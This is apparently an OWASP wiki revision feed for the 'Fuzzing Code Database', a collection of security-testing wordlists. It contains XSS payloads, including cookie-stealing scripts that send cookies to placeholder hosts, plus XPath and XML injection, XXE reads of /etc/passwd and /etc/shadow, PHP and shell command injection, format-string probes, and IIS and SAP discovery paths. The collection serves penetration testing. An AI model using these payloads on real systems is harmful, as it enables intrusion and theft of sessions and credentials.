&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=89339</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=89339"/>
				<updated>2010-09-15T19:38:27Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''15 September 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: SAP Common URL Web Interfaces (15 September 2010 - Total Statements: 6)&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== SAP Commom URL Web Interface (15 September 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/sap/bc/gui/sap/its/webgui&lt;br /&gt;
/sap/public/icman/ping&lt;br /&gt;
/sap/admin&lt;br /&gt;
/sap/public/info&lt;br /&gt;
/sap/wdisp/admin&lt;br /&gt;
/scripts/wgate&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (8 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (8 April 2010)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
/.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
